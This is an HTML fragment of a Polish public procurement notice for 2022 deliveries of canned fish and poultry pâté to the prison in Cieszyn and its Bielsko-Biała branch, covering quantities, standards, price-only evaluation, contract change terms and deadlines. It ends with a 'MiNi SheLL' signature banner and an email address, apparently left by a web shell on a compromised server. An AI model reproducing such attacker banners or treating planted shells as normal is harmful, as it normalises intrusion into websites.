stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia publicznego jest sukcesywna dostawa konserw.<br/>L.p.	Nazwa	j.m.	Ilość	<br/>1.	Paprykarz szczeciński	kg	1240,00	<br/>2.	Pasztet drobiowy	kg	970,00	<br/>3.	Szprot w pomidorach	kg	7600,00	<br/><br/>Paprykarz szczeciński – opakowanie metalowe 300 gram lub 330 gram/sztuka, zgodne z PN-91/A-86763.<br/><br/>Pasztet drobiowy - opakowanie metalowe 300 gram/sztuka, zgodne z PN-A-86525.<br/><br/>Szprot w pomidorach - opakowanie metalowe 300 gram lub 330 gram/sztuka, zgodne z PN-91/A-86763.<br/><br/><br/>Towar dostarczany będzie zamawiającemu do godz.1200 w dniu ustalonej dostawy według cen zgodnych z zawartą umową oraz ilości wskazanych przez Zamawiającego.<br/>Częstotliwość realizacji dostaw 6 razy w roku. Minimalny okres przydatności do spożycia dla poszczególnych towarów powinien wynosić 90 dni od dnia dostawy. Wszystkie partie towaru winny być oznakowane / data produkcji, termin przydatności do spożycia, nazwa producenta /. Podana ilość asortymentów jest szacunkowa i może ulec zmianie. Z tego powodu Wykonawcy nie będą przysługiwały żadne roszczenia wobec Zamawiającego.<br/><br/>Miejsce dostaw:<br/>1.	Zakład Karny w Cieszynie ul. Bolesława Chrobrego 2, 43-400 Cieszyn <br/>2.	Oddział Zewnętrzny w Bielsku-Białej Zakładu Karnego w Cieszynie ul. Juliusza Słowackiego 15A, 43-300 Bielsko-Biała. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15240000-2 - Ryby puszkowane i pozostałe ryby konserwowane lub przetworzone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15131130-5 - Wędliny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający nie zamierza zwoływać zebrania wykonawców. Rozliczenia między zamawiającym, a wybranym wykonawcą będą prowadzone w PLN. Integralną część specyfikacji stanowią:<br/>1.	Projekt umowy wraz z załącznikami.<br/>2.	Formularz ofertowy stanowiący załącznik nr 1a dla części I postępowania oraz 1b dla części II postępowania..<br/>3.	Druk oświadczenia o braku podstaw do wykluczenia, określonych w art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 4, 5, 8 i 10 ustawy stanowiący załącznik 2a dla części I postępowania oraz załącznik 2b dla części drugiej postępowania.<br/>4.	Wykonawcy zobowiązani są przedstawić ofertę zgodnie z wymaganiami określonymi w specyfikacji. Wykonawcy ponoszą wszelkie koszty związane z przygotowaniem i złożeniem oferty. Oferta musi być napisana czytelnie, w języku polskim (wskazany jest maszynopis lub wydruk komputerowy). Wszelkie poprawki lub zmiany w tekście oferty muszą być parafowane własnoręcznie przez osobę podpisującą ofertę.<br/>5.	W toku badania i oceny ofert zamawiający może żądać od wykonawców wyjaśnień treści złożonych ofert. Zamawiający poprawi w tekście oferty oczywiste omyłki pisarskie oraz omyłki rachunkowe w obliczeniu ceny, niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>6.	Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych w SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Strony, mając na uwadze ewentualną zmianę stawek podatku od towarów i usług, zgodnie postanawiają, iż w przypadku ich zmiany na mocy powszechnie obowiązujących przepisów prawa, zmianie może ulec cena jednostkowa brutto za poszczególny asortyment, przy zachowaniu następujących warunków:<br/>1) w sytuacji podwyższenia stawki podatku od towarów i usług dla danego asortymentu – Wykonawca uprawniony jest do podwyższenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego – Formularzu cenowym, a stawką obowiązującą po zmianie stawki; Wykonawca nie jest uprawniony do podwyższenia ceny jednostkowej brutto za asortyment dostarczony Zamawiającemu przed dniem zmiany stawki podatku;<br/>2) w sytuacji obniżenia stawki podatku od towarów i usług dla danego asortymentu – Wykonawca zobowiązany jest do obniżenia ceny jednostkowej brutto za dany asortyment o różnicę w stawkach podatku od towarów i usług pomiędzy stawką określoną w załączniku do oferty złożonej przez Wykonawcę w toku postępowania przetargowego – Formularzu cenowym, a stawką obowiązującą po zmianie stawki podatku.<br/>W przypadkach określonych w pkt. 1 oraz 2 powyżej, każdorazowo niezmienna pozostaje cena netto danego asortymentu, stanowiąca podstawę do naliczenia podatku od towarów i usług. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-22 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">. Wykonawca składa ofertę za pośrednictwem Formularza do złożenia, zmiany lub wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu (https://miniportal.uzp.gov.pl/). Sposób złożenia oferty, w tym zaszyfrowania oferty, opisany został w Instrukcji użytkownika dostępnej na miniPortalu.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-22 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com